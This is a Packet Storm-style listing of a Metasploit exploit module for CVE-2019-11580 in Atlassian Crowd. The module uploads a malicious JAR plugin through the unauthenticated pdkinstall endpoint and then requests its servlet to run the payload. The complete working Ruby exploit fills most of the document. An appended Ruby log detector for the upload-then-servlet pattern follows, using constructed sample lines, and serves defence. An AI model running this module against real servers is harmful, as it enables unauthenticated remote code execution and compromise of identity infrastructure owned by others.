Atlassian Crowd pdkinstall Remote Code Execution

Posted Aug 12, 2021
Authored by Paul, Corben Leo, Grant Willcox | Site metasploit.com

This Metasploit module uploads a plugin to Atlassian Crowd through the pdkinstall development plugin as an unauthenticated attacker. The payload is uploaded as a JAR archive containing a servlet via a POST request to /crowd/admin/uploadplugin.action, after which the servlet is triggered with a GET to /crowd/plugins/servlet/<name>. The check command verifies that /crowd/admin/uploadplugin.action exists and that it rejects a deliberately invalid plugin with a 400 "Unable to install plugin" response, which indicates the endpoint is reachable without authentication and the target is vulnerable.

tags | exploit
advisories | CVE-2019-11580
SHA-256 | 3e45d1541858eca07bdf958f9f224a9b488c705ba65f4fdb0909d25e3d5eb68f

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
        'Description' => %q{
          This module can be used to upload a plugin on Atlassian Crowd via
          the pdkinstall development plugin as an unauthenticated attacker.
          The payload is uploaded as a JAR archive containing a servlet using
          a POST request to /crowd/admin/uploadplugin.action. The check command will
          check that the /crowd/admin/uploadplugin.action page exists and that it
          responds appropriately to determine if the target is vulnerable or not.
        },
        'Author' => [
          'Paul', # Vulnerability discovery
          'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter.
          'Grant Willcox' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2019-11580'],
          ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
          ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
          ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
        ],
        'Platform' => %w[java],
        'Arch' => ARCH_JAVA,
        'DefaultOptions' => {
          'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out.
        },
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        },
        'Targets' => [
          [
            'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ]
        ],
        'DisclosureDate' => '2019-05-22'
      )
    )

    register_options(
      [
        Opt::RPORT(8095),
        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/'])
      ]
    )
  end

  # POSTs the given bytes as a multipart file part to the pdkinstall upload endpoint.
  def upload_plugin(content)
    data = Rex::MIME::Message.new
    data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
      'method' => 'POST',
      'data' => data.to_s,
      'ctype' => "multipart/mixed; boundary=#{data.bound}"
    }, datastore['HttpClientTimeout'])
  end

  # Builds the plugin JAR: the encoded Java payload, an atlassian-plugin.xml
  # descriptor registering a servlet under a random URL pattern, and the servlet class.
  def generate_plugin_jar
    name = Rex::Text.rand_text_alpha(8..12)
    servlet_name = Rex::Text.rand_text_alpha(8..12)
    atlassian_plugin_xml = %(
      <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
        <plugin-info>
          <param name="atlassian-data-center-compatible">true</param>
          <description></description>
          <version>1.0.0</version>
        </plugin-info>

        <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
          <url-pattern>/#{name}</url-pattern>
          <description>#{Faker::App.name}</description>
        </servlet>
      </atlassian-plugin>
    )

    # Generates .jar file for upload
    zip = payload.encoded_jar
    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)

    servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')
    zip.add_file('/metasploit/PayloadServlet.class', servlet)

    contents = zip.pack
    [contents, name]
  end

  # Uploads random junk as a plugin: a 400 "Unable to install plugin" response means the
  # endpoint accepted the unauthenticated upload and tried to install it.
  def check
    print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
    res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
    if res.nil?
      CheckCode::Unknown('Was not able to connect to the target!')
    elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
      CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
    else
      CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
    end
  end

  def exploit
    print_status('Generating a malicious JAR plugin...')
    content, plugin_name = generate_plugin_jar
    print_status('Uploading the malicious JAR plugin...')
    upload_plugin(content)
    # Requesting the servlet's URL pattern runs the payload inside Crowd.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
      'method' => 'GET'
    }, datastore['HttpClientTimeout'])
  end
end
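The module above leaves a distinctive two-step trace in the web server log: an unauthenticated POST to /crowd/admin/uploadplugin.action (a 400 when it is only the check probe), then a GET to /crowd/plugins/servlet/<random 8-12 letter name> from the same client. The following detector is an added example written for this page, not part of the Packet Storm entry or the Metasploit module; it assumes combined-format access logs and the module's default TARGETURI of /crowd/, and runs on constructed sample lines.

```ruby
require 'time'

# Request paths the module produces, assuming the default TARGETURI of /crowd/.
UPLOAD_PATH  = %r{\A/crowd/admin/uploadplugin\.action\z}
SERVLET_PATH = %r{\A/crowd/plugins/servlet/[A-Za-z]{8,12}\z} # rand_text_alpha(8..12) name
# Combined log format: client, timestamp, request line, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/

# Constructed sample lines (not real traffic): the check probe (400), a real
# upload (200) and the follow-up servlet hit from the same client.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [12/Aug/2021:10:00:01 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 400 512
  203.0.113.5 - - [12/Aug/2021:10:00:09 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 200 0
  203.0.113.5 - - [12/Aug/2021:10:00:12 +0000] "GET /crowd/plugins/servlet/kqzxwprtle HTTP/1.1" 200 0
  198.51.100.7 - - [12/Aug/2021:10:05:00 +0000] "GET /crowd/console/login.action HTTP/1.1" 200 1234
LOG

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# True when entry f is a GET to a plugin servlet path by the same client
# within `window` seconds after the upload entry e.
def servlet_hit?(e, f, window)
  f[:ip] == e[:ip] && f[:method] == 'GET' && f[:path] =~ SERVLET_PATH &&
    f[:time] > e[:time] && f[:time] - e[:time] <= window
end

# Returns one alert per POST to uploadplugin.action:
#   :check_probe     400 response, i.e. the module's check() sending junk as a plugin
#   :plugin_upload   any other status, a real upload attempt
#   :servlet_reached upload followed by the same client requesting the new servlet
def detect(log_text, window: 300)
  entries = log_text.lines.map { |l| parse_line(l) }.compact
  entries.each_with_object([]) do |e, alerts|
    next unless e[:method] == 'POST' && e[:path] =~ UPLOAD_PATH
    kind = e[:status] == 400 ? :check_probe : :plugin_upload
    kind = :servlet_reached if kind == :plugin_upload && entries.any? { |f| servlet_hit?(e, f, window) }
    alerts << { ip: e[:ip], time: e[:time], kind: kind }
  end
end

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each { |a| puts "#{a[:time].iso8601} #{a[:ip]} #{a[:kind]}" }
end
```

Any :plugin_upload or :servlet_reached alert on a Crowd instance that has not been upgraded per the advisory above warrants checking the installed-plugins directory for an unexpected JAR, since the upload persists on disk.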